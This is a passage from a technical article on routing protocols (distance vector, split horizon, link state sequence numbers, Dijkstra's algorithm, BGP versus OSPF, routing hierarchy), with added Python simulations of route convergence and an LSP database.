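            vector[dest] = (cost, [sender] + path)
    return vector

def process(tables, receiver, sender, vector, mode):
    """Merge the vector received from sender; returns True if anything changed."""
    changed = False
    for dest, (adv_cost, adv_path) in vector.items():
        if mode == "path_vector" and receiver in adv_path:
            continue  # fig 5: the route already passed through us, reject it
        new_cost = min(INFINITY, adv_cost + 1)  # one more hop, capped
        cur = tables[receiver].get(dest)
        # An update from the current next hop always replaces the route (it may
        # be a withdrawal); any other update is accepted only if strictly cheaper.
        if cur is None or cur[1] == sender or new_cost < cur[0]:
            if new_cost == INFINITY:
                new = (INFINITY, None, [])
            else:
                new = (new_cost, sender, adv_path)
            if new != cur:
                tables[receiver][dest] = new
                changed = True
    return changed

def simulate(mode, rounds=20):
    """Break link Y-Z (fig 2), then let X and Y exchange vectors once per round
    until nothing changes. Returns [(X's cost to Z, Y's cost to Z), ...]."""
    tables = initial_tables()
    tables["Y"]["Z"] = (INFINITY, None, [])  # fig 2: Y sees the link go down
    history = []
    for _ in range(rounds):
        x_to_y = advertise(tables, "X", "Y", mode)  # X still says Z:2
        y_to_x = advertise(tables, "Y", "X", mode)  # Y says Z:infinity
        changed = process(tables, "Y", "X", x_to_y, mode)
        changed |= process(tables, "X", "Y", y_to_x, mode)
        history.append((tables["X"]["Z"][0], tables["Y"]["Z"][0]))
        if not changed:
            break
    return history

if __name__ == "__main__":
    for mode in ("naive", "path_vector", "split_horizon"):
        print(mode, simulate(mode))
```

Plain distance vector bounces Z's cost between X and Y, rising by one per round until it hits 16 (fig 3 repeated), while both fixes settle on infinity after a single exchange.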
This avoids the count-to-infinity problem.

Another way to counter this problem is the split horizon. Basically, this means that a router shouldn't advertise a path to a neighbor if that neighbor is the next hop to the destination. This solves the problem presented in the example above because the path to Z from X through Y would not have been advertised to Y, because Y is the neighbor _and_ the next hop to the destination (Z). A variation called split horizon with poisoned reverse has router X advertise an infinite cost to get to destination Z. Under a plain split horizon, router X would simply not advertise that it could get to router Z.

----[ Link State Routing

A router using a link state routing protocol distributes the distance to its neighbors to every other router on the network. This allows each router on the network to make a routing table without knowing the full cost to the destination from any one source. The problems of loops are avoided because each router contains the full topology of the network. Basically, the router makes a 3 tuple containing the source router (itself), the neighbor and the cost to its neighbor. Therefore, if router A is connected to router B over a link of cost 3 and router A is connected to router C over a link of cost 5, then router A would advertise the Link State Packets (LSPs) <A, B, 3> and <A, C, 5> to all routers on this network. Each router on the network would evaluate all of the LSPs that it receives and calculate a shortest path to every destination on the network.

Obviously, the LSP is an integral part of the convergence process. If someone could inject false LSPs into the network, it could result in misrouted information (a packet taking a longer path than it should) or even in the blackholing of a router on the network. This is not necessarily a malicious attack on a network, however. Router C could advertise a link to its neighbor D with the 3 tuple <C, D, 6> and then withdraw the announcement when the link goes down.
Unfortunately, if the LSP advertising the link as having an infinite cost arrives before the LSP advertising the cost of that link being 6, the routing table will not reflect the topology of the network and will stay in that state until another LSP comes to correct the problem. To combat this, a sequence number is introduced into the LSP. Therefore, all of the routers on the network would initialize their sequence number to some starting value and then start advertising their LSPs. This solves the above problem in that the LSP advertising the link of infinite cost would have a higher sequence number than the LSP advertising the link as having cost 6.

Some problems encountered when using sequence numbers are finite sequence space, sequence initialization, and aging. A robust link state protocol needs to protect its LSPs as well as choose a sequence space which is sufficiently large to accommodate updates. The sequence space that the LSPs can use is set to some finite value. Therefore, when the sequence numbers reach the top of the space, they must wrap around towards the smallest sequence number. This presents a problem because when a router compares link state updates, the greater sequence number takes preference. To combat this problem, you can define a maximum age of the LSP. Therefore, if you have not received an update in X ticks, you discard the current LSP information and wait for a further update. It must be noted that this invalidates the path information to a destination. For example, if router Y advertises a cost to its neighbor router Z where router Y is connected by one link to a meshed network, when the link between the mesh and router Y breaks, the other routers in the mesh have preserved link state information that will allow them to find a path towards Z. If they receive no updates in MAX_AGE, then they will assume that the link to Y is unreachable.
This will allow each router to converge its table and allow it to advertise an infinite LSP for Y and Z.

Sequence initialization is also an important facet of this problem. Say router Y crashed and is rebooting while the network is recalculating paths to it. When it starts its link state protocol back up, it must somehow indicate that it needs to reinitialize its sequence number to the last number it gave all of the other routers to allow for coherence. Therefore, it can announce paths with a sequence number in a special "initialization set". This initialization set will tell the other routers that this router needs the sequence where it left off. This is the "lollipop sequence" idiom. The sequence space really resembles a lollipop in that the normal sequence numbers keep churning around the finite sequence space while reinitialization takes place in a short linear sequence space (comparable to the stick :).

Great pains are taken to ensure the integrity of LSPs. In fact, this entire routing algorithm depends on the LSPs being digested in a coherent manner to guarantee that each router has the correct view of the network topology.

The question still remains how the root node router computes the distance to each destination. Because of the general nature of a link state protocol, you have various nodes of the network advertising the distance to get to their neighbors to every other node on the network. Thus each node has a collection of neighbor distances from various routers on the network. The routing table is basically 'grown' outward from the root node to all of the network extremities. This will be explained in a slightly rigorous fashion in the next section.

----[ Dijkstra's Algorithm

This algorithm is a simple and elegant way to determine network topology. Basically, there are two distinct sets of destinations on the network. Destinations in set K are known routes for which a shortest path has been computed.
Destinations in set U are routers for which the best path to that router is not currently known. In this set, paths are being considered as candidates to be the best path to that destination. To start off, add the current node p into the set K. Then add all of its neighbors into the set U with path/cost associations. If there is another path to one of the neighbors in the U set, then choose the path which costs the least. When the neighbors N* are added to U, make sure that they indicate the cost through p as well as p's ID. Once this has been done for the set U, then pick the neighbor n to p which has the smallest cost to reach p. This is assuming that the neighbor has not already been installed in K. This algorithm stops when set U is equivalent to the empty set. When set U is null, it is implied that all destinations are in set K and have the shortest cost from the root node P on which this algorithm is running. Note that each step adds ONE neighbor into K. That neighbor is the router with the smallest cost to reach p.

----[ Distance Vector vs. Link State

We are left with these protocols like BGP, which uses path vector, and OSPF, which uses link state. Why do they occupy such orthogonal space? When a link state protocol is working correctly, it guarantees that there will be no routing loops in the network. The link state protocol also guarantees fast convergence when there is a change in the topology of the network because the link state is distributed on a flat routing space. Since link state protocols contain these inherent advantages, why do protocols like BGP choose to employ the path vector approach? Taking a cross-section of routing protocols that are employed on the internet, one finds that the majority of large providers use OSPF to resolve routing information on their internal network and BGP to talk to other distinct networks (or autonomous systems) at their borders of administration.
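An added example (not code from the article) tying the LSP sequence-number rule to the Dijkstra computation: an LSP database that keeps only the highest sequence number seen per link, fed the A-B cost 3 and A-C cost 5 links from the text plus a constructed B-C link and the C-D cost 6 link, including the case where the withdrawal of C-D arrives before a late copy of the cost-6 LSP; Dijkstra's K and U sets are then grown from root A. The 3-tuple layout, the sequence numbers and the extra B-C link are assumptions of the example.

```python
"""Constructed link state database plus Dijkstra over the topology it holds."""

INFINITY = float("inf")  # an LSP with infinite cost withdraws the link

class LSDB:
    """One entry per advertised link: (source, neighbor) -> (seq, cost).
    Only a strictly higher sequence number replaces an entry, so a withdrawal
    (seq 2, infinite cost) that arrives before the original advertisement
    (seq 1, cost 6) is not undone by the late LSP."""

    def __init__(self):
        self.links = {}

    def receive(self, src, nbr, cost, seq):
        """Install the LSP <src, nbr, cost> if it is newer; returns True if installed."""
        cur = self.links.get((src, nbr))
        if cur is not None and seq <= cur[0]:
            return False  # stale or duplicate LSP: discard
        self.links[(src, nbr)] = (seq, cost)
        return True

    def topology(self):
        """Adjacency map src -> {nbr: cost} of links that are currently up."""
        adj = {}
        for (src, nbr), (_, cost) in self.links.items():
            if cost != INFINITY:
                adj.setdefault(src, {})[nbr] = cost
        return adj

def dijkstra(adj, root):
    """Grow set K (known) out of set U (candidates) as the article describes.
    Each iteration moves exactly ONE router, the cheapest in U, into K.
    Returns dest -> (cost, next hop from root)."""
    K = {root: (0, None)}
    U = {nbr: (cost, nbr) for nbr, cost in adj.get(root, {}).items()}
    while U:
        node = min(U, key=lambda n: U[n][0])
        cost, nhop = U.pop(node)
        K[node] = (cost, nhop)
        for nbr, lcost in adj.get(node, {}).items():
            if nbr in K:
                continue
            if nbr not in U or cost + lcost < U[nbr][0]:
                U[nbr] = (cost + lcost, nhop)  # next hop is inherited from node
    return K

def build_example():
    """Constructed 4-router topology; each end advertises its own adjacency."""
    db = LSDB()
    for a, b, c in [("A", "B", 3), ("A", "C", 5), ("B", "C", 1), ("C", "D", 6)]:
        db.receive(a, b, c, 1)
        db.receive(b, a, c, 1)
    return db

def withdrawal_before_advertisement():
    """Returns (routes from A with C-D withdrawn, routes after it comes back)."""
    db = build_example()
    db.receive("C", "D", INFINITY, 2)  # link C-D goes down
    db.receive("D", "C", INFINITY, 2)
    assert not db.receive("C", "D", 6, 1)  # late copy of the old LSP: rejected
    down = dijkstra(db.topology(), "A")
    db.receive("C", "D", 6, 3)  # link returns with a fresh sequence number
    db.receive("D", "C", 6, 3)
    up = dijkstra(db.topology(), "A")
    return down, up

if __name__ == "__main__":
    print(withdrawal_before_advertisement())
```

Without the sequence check the late cost-6 LSP would put D back into A's table while the link is actually down, which is exactly the inconsistent state the article describes.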
What suits BGP as an external protocol and OSPF for an internal routing protocol? One issue, which will be discussed in the next section, is hierarchy. BGP provides a mechanism for a routing hierarchy which enables it to greatly reduce the space of its table. OSPF, which is a link state protocol, provides a flat routing table whereby any internal router knows the full hop by hop path to any destination within the autonomous system. Furthermore, distance vector protocols accept that different areas can have different views of the network, whereas link state protocols require that each node independently compute a consistent view of the network. This saves the DV protocol the overhead of maintaining a correct LSP database. BGP also has another 'advantage' in that it is layered on top of the Transmission Control Protocol (TCP). Therefore, in the 'best-effort' service of IP networks, BGP has assurance (to the level that TCP can guarantee) that routing information will be propagated. While you can (or should be able to) govern the status of your internal network, the nebulous exterior past your border routers confers no delivery guarantee on your routing information.

Each type of routing algorithm is suited for its function. Link State protocols provide the quick convergence that is essential to an internal network while distance vector protocols provide external reachability. Hierarchy is not something that is inherent in distance vector protocols, but the implementation of a hierarchy has made BGP a widely used exterior gateway protocol.

----[ Routing Hierarchy

Routing hierarchy is an oft fought debate that borders on religion. There are constantly questions about how hierarchy should be implemented (if at all) in the free form state of the current global network. Hierarchy imposes a tree of authority with the overall authority at the top of the tree, branching down to regional authorities, local authorities, ad infinitum.
Hierarchy simplifies routing because if a destination is not locally routable (or under your section of the tree), you can iterate up towards the top of the tree to try and deliver that information. As you move towards the top, the routing information contained in the routers becomes less and less specific until you reach the root node, which is the least specific. It does, however, know how to route information to every possible destination on the network. It may help you to envision the hierarchy of the telephone network (built under one collective). If a call cannot be placed within a central office, it is handed to either